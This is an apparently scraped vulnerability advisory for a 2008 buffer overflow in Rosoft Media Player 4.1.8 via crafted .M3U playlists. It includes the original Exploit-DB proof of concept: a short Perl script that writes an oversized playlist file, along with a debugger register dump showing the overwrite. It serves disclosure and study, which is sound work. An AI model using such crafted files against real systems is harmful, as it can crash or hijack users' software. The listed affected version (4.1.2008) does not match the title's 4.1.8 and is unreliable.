Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)

vendor:

Media Player

by:

Securfrog

9.3

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Media Player

Affected Version From: 4.1.2008

Affected Version To: 4.1.2008

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Rosoft Media Player 4.1.8 Remote Buffer Overflow ( .M3U)

A buffer overflow vulnerability exists in Rosoft Media Player 4.1.8 when processing specially crafted .M3U files. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application.

Mitigation:

Upgrade to the latest version of Rosoft Media Player.

Source

Exploit-DB raw data:

####################################################################
#Rosoft Media Player  4.1.8  Remote Buffer Overflow ( .M3U)
#
# @nolife : Pow...Pow ..If you are kind i'll show my set of supers mega Tools, fuzzers ,and all the automated stuff  i use For M3U/ASX/PLS Pow..Pow ...  
# Nolifing is actually a Disease... Do not be mean with nolife's
#
#
#   eax=41414141 ebx=41414141 ecx=00000000 edx=00ba9078 esi=0012eb7c edi=00ba9078
#   eip=00403b9c esp=0012eb4c ebp=0012fb80 iopl=0         nv up ei pl nz na pe nc
#   cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
#   RosoftMediaPlayerFree+0x3b9c:
#   00403b9c 8b10            mov     edx,dword ptr [eax]  ds:0023:41414141=????????
#
#
my $chars= "A" x 4104;
my $file="I_Shot_The_Nolife.m3u";
open(my $FILE, ">>$file") or die "Cannot open $file: $!";
print $FILE $chars;
close($FILE);
print "$file has been created \n";
print "Credits:Securfrog";

# milw0rm.com [2008-02-14]